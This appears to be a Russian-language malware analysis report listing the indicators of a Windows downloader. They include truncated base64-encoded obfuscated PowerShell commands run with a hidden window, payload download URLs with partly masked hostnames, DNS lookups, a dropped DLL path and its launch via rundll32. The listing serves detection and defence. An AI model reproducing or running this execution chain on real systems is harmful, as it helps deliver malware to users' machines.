Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBWAEEAUgBJAEEAYgBMAEUAIABXAEsAMQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMQB9AHsANQB9AHsAMgB9AHsANAB9AHsAMAB9AHsAMwB9ACIALQBmACAAJwBJAFIARQAnACwAJwBTAHkAUwBUACcALAAnAC4AaQ...
- %HOMEPATH%\bx06ayy\qm1luf0\kgj3a6o.dll
- http://cu###m.robi2.hu/r0779g.zip
- http://b1#.#obi2.hu/bznqxuny1.zip
- http://ma####chankhong.tv/ug6utpv39
- DNS ASK cu###m.robi2.hu
- DNS ASK ci##s.in
- DNS ASK b1#.#obi2.hu
- DNS ASK pu####.#ltosaxplayer.com
- DNS ASK ma####chankhong.tv
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBWAEEAUgBJAEEAYgBMAEUAIABXAEsAMQAgACgAWwBUAFkAcABFAF0AKAAiAHsAMQB9AHsANQB9AHsAMgB9AHsANAB9AHsAMAB9AHsAMwB9ACIALQBmACAAJwBJAFIARQAnACwAJwBTAHkAUwBUACcALAAnAC4AaQ...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Bx06ayy\Qm1luf0\Kgj3a6o.dll 0